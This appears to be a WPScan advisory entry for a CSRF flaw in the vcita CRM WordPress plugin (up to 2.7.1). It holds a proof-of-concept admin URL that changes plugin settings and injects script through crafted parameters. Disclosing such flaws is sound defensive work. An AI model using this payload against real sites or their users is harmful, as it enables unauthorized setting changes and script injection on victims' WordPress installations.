CRM and Lead Management by vcita <= 2.7.1 - Settings Update Via CSRF

2023-06-0200:00:00

wpscan.com

csrf protection bypass

unauthenticated attack

arbitrary script injection

settings vulnerability

0.001 Low

EPSS

Percentile

44.7%

JSON

The plugin does not protect its settings page against CSRF attacks, allowing an unauthenticated attacker to inject arbitrary web scripts by tricking a user with the contributor role or higher to click a link. The plugin does not protect its settings page against CSRF attacks, allowing an unauthenticated attacker to change the plugin’s settings, and on older versions (<= 2.7.0), inject arbitrary web-scripts, by tricking a logged in user with the contributor role or higher to click a link.

PoC

https://example.com/wp-admin/admin.php?page=crm-customer-relationship-management-by-vcita/vcita-callback.php&success;=true&first;_name=a-a&last;_name=b&title;=c&confirmation;_token=d&confirmed;=true&engage;_delay=1&implementation;_key=1&email;=a“/>&uid;=a”alert(2);

CPENameOperatorVersion
crm-customer-relationship-management-by-vcitaeq*

CPE	Name	Operator	Version
	crm-customer-relationship-management-by-vcita	eq	*

References

blog.jonh.eu/blog/security-vulnerabilities-in-wordpress-plugins-by-vcita

plugins.trac.wordpress.org/browser/crm-customer-relationship-management-by-vcita/trunk/vcita-callback.php

0.001 Low

EPSS

Percentile

44.7%

JSON

Related for WPVDB-ID:6C2E9ACE-8FB4-426A-82FA-BB8B6F7D6FB8